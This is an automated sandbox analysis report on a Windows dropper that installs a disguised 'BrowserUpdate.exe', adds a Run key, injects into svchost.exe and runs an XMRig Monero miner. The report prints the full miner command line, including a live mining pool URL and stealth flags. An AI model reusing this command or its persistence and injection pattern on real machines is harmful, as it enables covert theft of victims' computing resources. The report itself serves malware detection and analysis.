Analysis
- max time kernel: 142s
- max time network: 155s
- platform: windows10-2004_x64
- resource: win10v2004-20220901-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 25-11-2022 09:31
Static task
- static1
Behavioral task
- behavioral1
  - Sample: 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe
  - Resource: win7-20221111-en
Behavioral task
- behavioral2
  - Sample: 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe
  - Resource: win10v2004-20220901-en
General
- Target: 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe
- Size: 2.1MB
- MD5: 457115eb0e95e1377f8beaa00b545871
- SHA1: 9cb01f9d44134355f9f55cf68ef02740e2aee8f0
- SHA256: 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef
- SHA512: 55328834359be46e42b34afa96c89fc26a52928768bd6ecff0a49f5d823d97e3e3d3b3f53e6de9a18549856517d8ccfc1e9cc363e6360a91fa0ea7aa9a36ce5a
- SSDEEP: 49152:Uzb5vW78fienXiALMq/09Jbqj0s/YYP6mN:IxhieXt09jaIm
Malware Config
Signatures
- XMRig Miner payload (6 IoCs)
  Processes:
  resource | yara_rule
  behavioral2/memory/824-141-0x0000000140000000-0x000000014072E000-memory.dmp | xmrig
  behavioral2/memory/824-142-0x00000001402CCBC8-mapping.dmp | xmrig
  behavioral2/memory/824-144-0x0000000140000000-0x000000014072E000-memory.dmp | xmrig
  behavioral2/memory/824-145-0x0000000140000000-0x000000014072E000-memory.dmp | xmrig
  behavioral2/memory/824-147-0x0000000140000000-0x000000014072E000-memory.dmp | xmrig
  behavioral2/memory/824-148-0x0000000140000000-0x000000014072E000-memory.dmp | xmrig
- Executes dropped EXE (1 IoC)
  Processes:
  pid | process
  220 | BrowserUpdate.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes:
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe
- Cryptocurrency Miner
  Makes network request to known mining pool URL.
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BrowserUpdate.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\BrowserUpdate.exe" | 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
  description | pid | process | target process
  PID 220 set thread context of 824 | 220 | BrowserUpdate.exe | svchost.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (23 IoCs)
  Processes:
  pid | process
  4252 | 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe (this row is listed 23 times in the report)
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes:
  description | pid | process
  Token: SeDebugPrivilege | 4252 | 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe
  Token: SeDebugPrivilege | 220 | BrowserUpdate.exe
  Token: SeLockMemoryPrivilege | 824 | svchost.exe
  Token: SeLockMemoryPrivilege | 824 | svchost.exe
- Suspicious use of WriteProcessMemory (17 IoCs)
  Processes:
  description | pid | process | target process
  PID 4252 wrote to memory of 220 | 4252 | 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe | BrowserUpdate.exe (listed 2 times)
  PID 220 wrote to memory of 824 | 220 | BrowserUpdate.exe | svchost.exe (listed 15 times)
Processes
- C:\Users\Admin\AppData\Local\Temp\2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe"
  - Checks computer location settings
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 4252
  - C:\Users\Admin\AppData\Local\Temp\BrowserUpdate.exe (depth 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\BrowserUpdate.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 220
    - C:\WINDOWS\System32\svchost.exe (depth 3)
      Command line: C:\WINDOWS\System32\svchost.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=stratum+tcp://xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=40 --donate-level=5 --unam-idle-wait=5 --unam-idle-cpu=90 --unam-stealth
      - Suspicious use of AdjustPrivilegeToken
      PID: 824
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\BrowserUpdate.exe
  - Filesize: 2.1MB
  - MD5: 457115eb0e95e1377f8beaa00b545871
  - SHA1: 9cb01f9d44134355f9f55cf68ef02740e2aee8f0
  - SHA256: 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef
  - SHA512: 55328834359be46e42b34afa96c89fc26a52928768bd6ecff0a49f5d823d97e3e3d3b3f53e6de9a18549856517d8ccfc1e9cc363e6360a91fa0ea7aa9a36ce5a
- memory/220-140-0x00007FF8F91E0000-0x00007FF8F9CA1000-memory.dmp (Filesize: 10.8MB)
- memory/220-139-0x0000000002DB0000-0x0000000002DC2000-memory.dmp (Filesize: 72KB)
- memory/220-134-0x0000000000000000-mapping.dmp
- memory/220-143-0x00007FF8F91E0000-0x00007FF8F9CA1000-memory.dmp (Filesize: 10.8MB)
- memory/220-138-0x00007FF8F91E0000-0x00007FF8F9CA1000-memory.dmp (Filesize: 10.8MB)
- memory/824-141-0x0000000140000000-0x000000014072E000-memory.dmp (Filesize: 7.2MB)
- memory/824-142-0x00000001402CCBC8-mapping.dmp
- memory/824-144-0x0000000140000000-0x000000014072E000-memory.dmp (Filesize: 7.2MB)
- memory/824-145-0x0000000140000000-0x000000014072E000-memory.dmp (Filesize: 7.2MB)
- memory/824-146-0x00000273773D0000-0x00000273773E4000-memory.dmp (Filesize: 80KB)
- memory/824-147-0x0000000140000000-0x000000014072E000-memory.dmp (Filesize: 7.2MB)
- memory/824-148-0x0000000140000000-0x000000014072E000-memory.dmp (Filesize: 7.2MB)
- memory/4252-132-0x0000000000250000-0x0000000000470000-memory.dmp (Filesize: 2.1MB)
- memory/4252-133-0x00007FF8F91E0000-0x00007FF8F9CA1000-memory.dmp (Filesize: 10.8MB)
- memory/4252-137-0x00007FF8F91E0000-0x00007FF8F9CA1000-memory.dmp (Filesize: 10.8MB)